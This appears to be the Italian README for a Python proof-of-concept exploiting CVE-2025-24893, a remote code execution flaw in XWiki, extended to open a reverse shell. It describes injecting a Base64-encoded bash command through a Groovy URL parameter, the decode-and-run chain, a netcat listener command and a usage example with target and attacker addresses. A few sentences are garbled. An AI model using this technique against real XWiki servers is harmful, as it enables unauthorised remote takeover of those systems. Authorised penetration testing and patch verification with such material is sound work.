
CVE-2025-24893 exploit RCE per XWiki con capacità di reverse shell
Disclaimer: Questo script è destinato esclusivamente a scopi educativi e test di sicurezza autorizzati. Non utilizzarlo su sistemi di cui non possiedi o di cui non hai esplicito permesso di testare. L'uso improprio può essere illegale e pericoloso.
Questo script Python sfrutta CVE-2025-24893, una vulnerabilità di Remote Code Execution che colpisce le versioni di XWiki fino alla 15.10.10.
Questa versione estende il PoC originale di Al Baradi Joy per generare una reverse shell. Il PoC originale può essere trovato qui.
XWiki esegue codice Groovy tramite il parametro URL.
L'exploit inietta un comando bash -c in questo template Groovy.
Una reverse shell normale contiene più apici (' e ) che potrebbero e l'URL.
"Per risolvere questo, lo script codifica il comando shell in una singola riga in Base64.
Il payload viene quindi inviato nell'URL ed eseguito utilizzando la seguente catena:
{echo,<base64>} | {base64,-d} | {bash,-i}
Questo decodifica il payload Base64 in modo sicuro e lo esegue con bash -i, fornendo una reverse shell interattiva.
http://<target-host>/ alla fine/xwiki (lo script lo aggiunge automaticamente)Esempi:
# Correct
http://10.129.95.114:8080
http://example.com:8080
# Incorrect
http://10.129.95.114:8080/ # trailing slash
http://example.com/xwiki # includes /xwiki
Prima di eseguire l'exploit, devi avviare un listener sulla tua macchina per catturare la reverse shell.
Esempio con Netcat:
nc -lvnp <lport>
<lport> deve corrispondere alla porta che fornisci come argomento allo script.python3 cve-2025-24893.py <target_base_url> <lhost> <lport>
Esempio:
python3 cve-2025-24893.py http://10.129.95.114:8080 10.0.0.5 4444